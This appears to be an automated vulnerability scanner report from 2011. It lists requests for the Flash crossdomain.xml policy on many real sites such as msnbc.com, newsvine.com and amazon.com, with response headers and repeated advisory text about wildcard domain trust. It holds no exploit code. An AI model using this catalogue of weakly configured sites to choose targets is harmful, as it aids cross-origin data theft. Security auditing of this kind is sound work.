GET /crossdomain.xml HTTP/1.0 Host: latino.video.redacted
Response
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Length: 530 Content-Type: text/xml Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT Accept-Ranges: bytes ETag: "01042b01256ca1:179a" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:09:11 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: live.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:08:24 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT ETag: "d5c01d-191-492fdc6f26c40" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=993 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: michaelwann.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:08:31 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT ETag: "d5c01d-191-492fdc6f26c40" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=976 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:16:23 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: msnbcmedia.redacted
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:16:31 GMT Last-Modified: Thu, 27 Jan 2011 21:27:54 GMT Content-Type: text/xml ETag: "0e9d6e69becb1:484" Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET Content-Length: 1021 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: mtp.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:16:52 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: music.aol.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:16:53 GMT Server: Apache Accept-Ranges: bytes Content-Length: 1147 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: nbcsports.msnbc.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:25b" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-Cnection: close Content-Length: 3744 Cache-Control: public, max-age=0 Expires: Sun, 30 Jan 2011 02:17:06 GMT Date: Sun, 30 Jan 2011 02:17:06 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: netscape.aol.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: news.discovery.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.15 (Unix) Last-Modified: Mon, 13 Dec 2010 19:02:38 GMT ETag: "238b88-1763-4974f58fc8f80" Accept-Ranges: bytes Content-Length: 5987 Content-Type: application/xml Date: Sun, 30 Jan 2011 02:17:14 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: nightly.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:17 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ninemsn.video.redacted
Response
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Length: 530 Content-Type: text/xml Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT Accept-Ranges: bytes ETag: "01042b01256ca1:1892" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:21 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: openchannel.msnbc.redacted
Response
HTTP/1.0 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT ETag: "20b4005-191-492fdc7203300" Accept-Ranges: bytes Content-Length: 401 Content-Type: text/xml Date: Sun, 30 Jan 2011 02:17:31 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication.com
Response
HTTP/1.0 200 OK P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sat, 29 Jan 2011 18:12:35 GMT Expires: Sun, 30 Jan 2011 18:12:35 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 25915 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: photobucket.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:17:47 GMT Server: Apache Last-Modified: Wed, 15 Dec 2010 14:02:49 GMT ETag: "434d16-52f-497736470f440" Accept-Ranges: bytes Content-Length: 1327 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: rachel.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:18:12 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: redtape.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:18:24 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT ETag: "3c057-191-492fdc72f7540" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=981 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-Cnection: close Date: Sun, 30 Jan 2011 01:24:11 GMT Content-Length: 1581 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: suzanne-choney.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:19:29 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT ETag: "3c057-191-492fdc72f7540" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=980 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: technolog2.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:53:39 GMT Server: Apache/2.2.14 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT ETag: "12f800b-191-492fdc72f7540" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=990 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: thelastword.msnbc.redacted
Response
HTTP/1.0 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT ETag: "20b4005-191-492fdc7203300" Accept-Ranges: bytes Content-Length: 401 Content-Type: text/xml Date: Sun, 30 Jan 2011 02:55:26 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: today.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:56:38 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: toddkenreck.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:57:49 GMT Server: Apache/2.2.14 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT ETag: "12f800b-191-492fdc72f7540" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=990 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: top.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:58:28 GMT Server: Apache/2.2.14 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT ETag: "12f800b-191-492fdc72f7540" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=1000 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: tv.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 03:01:27 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: wbenedetti.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:05:14 GMT Server: Apache/2.2.14 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT ETag: "12f800b-191-492fdc72f7540" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=999 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.adobe.com
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Wed, 12 Jan 2011 18:55:31 GMT ETag: "144-bec64ec0" Accept-Ranges: bytes Cache-Control: max-age=21600 Expires: Sat, 29 Jan 2011 20:53:25 GMT Keep-Alive: timeout=5, max=500 Content-Type: text/x-cross-domain-policy Connection: close Date: Sun, 30 Jan 2011 01:52:11 GMT Age: 196 Content-Length: 324
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.amazon.com
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:30:31 GMT Server: Server Last-Modified: Tue, 09 Nov 2010 18:03:08 GMT ETag: "3e0-8d97ef00" Accept-Ranges: bytes Content-Length: 992 Vary: Accept-Encoding,User-Agent Content-Type: text/xml Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.blackvoices.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.habitablezone.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:06:10 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Mon, 09 Nov 2009 03:13:40 GMT ETag: "1881b-3d2-477e794890100" Accept-Ranges: bytes Content-Length: 978 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.hoovers.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:53:36 GMT Server: Apache Last-Modified: Fri, 21 Jan 2011 00:59:01 GMT ETag: "bf" Accept-Ranges: bytes Content-Length: 191 Vary: Accept-Encoding Content-Type: text/xml Set-Cookie: HID=173.193.214.243.1296352416699562; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com Set-Cookie: BIGipServerhaspriv-colo1=201052682.20480.0000; path=/ P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE" Connection: close Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT Accept-Ranges: bytes ETag: "80c394d6f2bdcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 03:07:03 GMT Connection: close Content-Length: 3744
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.newsvine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:23:07 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT ETag: "3c057-191-492fdc72f7540" Accept-Ranges: bytes Content-Length: 401 Keep-Alive: timeout=3, max=1000 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.polls.newsvine.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Tue, 19 Oct 2010 20:02:53 GMT ETag: "a14031-191-492fdc72f7540" Accept-Ranges: bytes Content-Length: 401 Content-Type: text/xml Date: Sun, 30 Jan 2011 01:23:01 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.popularmechanics.com
Response
HTTP/1.0 200 OK Server: Apache Content-Length: 2016 Content-Type: application/xml Cache-Control: max-age=422 Date: Sun, 30 Jan 2011 03:18:22 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.reuters.com
Response
